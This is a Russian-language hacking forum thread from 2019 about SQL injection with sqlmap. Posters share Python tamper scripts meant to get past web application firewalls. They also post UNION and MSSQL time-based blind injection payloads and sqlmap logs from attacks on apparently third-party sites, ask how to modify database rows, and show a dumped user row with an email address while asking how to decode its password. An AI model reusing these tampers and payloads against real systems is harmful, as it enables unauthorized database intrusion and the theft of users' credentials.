ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

18.03.2019, 11:34
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме: 3935
Репутация:
3
|
|
Сообщение от BenderMR
↑
Подкиньте название тампера для инжекта такого вида: target.com/index.php?id=4668' /*!50000uNiOn*/ /*!50000sElEcT*/ 'here', 1-- -.
Руками раскрутить проблемы нет, но не знаю как мапу скормить
В tamper/versionedkeywords.py где /*!%s*/ поменять на своё значение /*!12345%s*/
и использовать randomcase
--tamper=randomcase,versionedkeywords
|
|
|

19.03.2019, 06:39
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
Провел на форуме: 22457
Репутация:
10
|
|
Сообщение от hibar1Xs
↑
В tamper/versionedkeywords.py где
/*!%s*/
поменять на своё значение
/*!12345%s*/
и использовать
randomcase
--tamper=randomcase,versionedkeywords
Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
|
|
|

19.03.2019, 08:22
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от BenderMR
↑
Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
Создаешь в папке с тампером новый файл, как пример:
Код:
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the CONCAT() function
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'%73CHEMA
"""
if payload:
payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
payload = payload.replace("table_name", "/*!12345%74able_name*/")
payload = payload.replace("SCHEMA", "%73CHEMA")
payload = payload.replace("schema", "%73chema")
return payload
и играешься как хочешь, с нужными функциями
|
|
|

19.03.2019, 10:54
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме: 3935
Репутация:
3
|
|
Сообщение от BenderMR
↑
Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
В repStr перечислять нужное через " |" (регистр неважен) и экранировать спец. символы :
Код:
#!/usr/bin/env python
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHER
def tamper(payload, **kwargs):
def process(match):
word = match.group('word')
return match.group().replace(word, "/*!12345%s*/" % word)
retVal = payload
if payload:
repStr = "table_name|information_schema"
retVal = re.sub(r"(?P" + repStr + ")", lambda match: process(match), retVal,flags=re.IGNORECASE)
return retVal
|
|
|

19.03.2019, 17:20
|
|
Новичок
Регистрация: 10.01.2017
Сообщений: 11
Провел на форуме: 3505
Репутация:
0
|
|
Доброго здоровья всем форумчанам!
Начал более глубоко вникать в построение запросов. За основу взял sqlmap. Опишу две ситуации которые мне не удалось никак для себя объяснить.
Ситуация 1
Есть некий сайт, который я раскрутил руками с помощью UNION и получил имя текущей БД. Дальше двигаться не стал. Никакого WAV там нет, тестил whatwav. Ну и вручную всё вошло без лишних вопросов. Заряжаю в sqlmap, --technique=U. В итоге, sqlmap крутил-крутил, потом сказал «ой, всё!» и выдал, что слишком много ошибок 404 и сослался на WAF. WTF?
Ситуация 2
Сайт полностью раскручен sqlmap и снова --technique=U. В данный момент вникаю именно в эту технику. Получаю список БД. Там же, в конце процесса sqlmap выдает готовый payload с помощью которого он получил результат. Я понимаю sql и мне всё понятно. Беру этот payload, вставляю в броузер. В итоге выдаёт ошибку синтаксиса. Почему?
Буду благодарен любой помощи в решении этих проблем.
|
|
|

20.03.2019, 07:02
|
|
Новичок
Регистрация: 10.01.2017
Сообщений: 11
Провел на форуме: 3505
Репутация:
0
|
|
Сообщение от noj
↑
Привет, посоветовали обратиться к вам. Весь день игрался с sqlmap. Добрался до дб, но вот получить столбцы никак.
Запрос: -u "
https://www.site.com/ParticipationList.asp?Program=TCTS
" --random-agent --risk=1 --level=1 --timeout=10 -D master --tables --threads 10 --hex
Отдает пустые значения, в другой базе из 68 столбцов показало 2: А и 5. Использовал темперы: ifnull2casewhenisnull, between, charunicodeencode и ещё с десяток. Результат на месте.
Подскажет может кто в чем ошибка.
Код:
[20:06:20] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:20] [PAYLOAD] TCTS' IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM master..sysobjects WHERE xtype = CHAR(85)),1,1))>48) WAITFOR DELAY '0:0:5'--
[20:06:20] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:20] [PAYLOAD] TCTS' IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM master..sysobjects WHERE xtype = CHAR(85)),1,1))>1) WAITFOR DELAY '0:0:5'--
[20:06:21] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:21] [INFO] retrieved:
[20:06:21] [DEBUG] performed 4 queries in 1.94 seconds
[20:06:21] [WARNING] unable to retrieve the number of tables for database 'master'
[20:06:21] [CRITICAL] unable to retrieve the tables for any database
[20:06:21] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 24 times
[20:06:21] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
тип:
Код:
Parameter: Program (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Program=TCTS' AND 1076=1076 AND 'glgo'='glgo
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: Program=TCTS' WAITFOR DELAY '0:0:5'--
Попробуйте утилиту whatwav. Она определяет тип WAF и тампер(ы), который нужно использовать. Но это не факт. Попробуйте руками. Здесь на борде есть статьи как обходить WAV
|
|
|

22.03.2019, 03:03
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
Провел на форуме: 22457
Репутация:
10
|
|
Джентельмены, реально ли через sqlmap обновить поле в колонке читая текст из filename.txt используя --sql-shell?
Что то типа UPDATE tablename SET textcolumn= filename.txt WHERE id=1?
P.S есть ли вообще такая возможность, чтобы текст со своего файла туда залить и как такой запрос должен выглядить
|
|
|

22.03.2019, 12:13
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме: 3935
Репутация:
3
|
|
Сообщение от BenderMR
↑
Джентельмены, реально ли через sqlmap обновить поле в колонке читая текст из filename.txt используя --sql-shell?
Что то типа UPDATE tablename SET textcolumn= filename.txt WHERE id=1?
P.S есть ли вообще такая возможность, чтобы текст со своего файла туда залить и как такой запрос должен выглядить
Если SELECT, то обновить можно при условии запроса в бд через mysqli_multi_query или PDO::query. Или тип бд mssql.
Если INSERT, то можно обновить поле при наличии PRIMARY KEY в таблице.
https://dev.mysql.com/doc/refman/8.0...duplicate.html
В SET textcolumn = 'содержимое filename.txt'
|
|
|

22.03.2019, 13:57
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме: 3935
Репутация:
3
|
|
Сообщение от MrBa
↑
Доброго здоровья всем форумчанам!
Начал более глубоко вникать в построение запросов. За основу взял sqlmap. Опишу две ситуации которые мне не удалось никак для себя объяснить.
Ситуация 1
Есть некий сайт, который я раскрутил руками с помощью UNION и получил имя текущей БД. Дальше двигаться не стал. Никакого WAV там нет, тестил whatwav. Ну и вручную всё вошло без лишних вопросов. Заряжаю в sqlmap, --technique=U. В итоге, sqlmap крутил-крутил, потом сказал «ой, всё!» и выдал, что слишком много ошибок 404 и сослался на WAF. WTF?
Ситуация 2
Сайт полностью раскручен sqlmap и снова --technique=U. В данный момент вникаю именно в эту технику. Получаю список БД. Там же, в конце процесса sqlmap выдает готовый payload с помощью которого он получил результат. Я понимаю sql и мне всё понятно. Беру этот payload, вставляю в броузер. В итоге выдаёт ошибку синтаксиса. Почему?
Буду благодарен любой помощи в решении этих проблем.
sqlmap генерирует свой префикс и суффикс. Если использовался при раскрутке, то укзать через --prefix --suffix.
https://github.com/sqlmapproject/sqlmap/wiki/Usage
|
|
|

24.03.2019, 22:44
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме: 4776
Репутация:
0
|
|
скуля в юнион
мускул(MariaDB fork)
проблема с кодировкой password (blob)
вид:| Linkinsgirl69@yahoo.com | G/\x12\\?ЦУ?дЬЧП?XP_ | 2 |
попробывал выводить с --binary-fields=password , c --hex , вид не меняется .
Есть ли способы вытащить пароль в нормальном виде?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|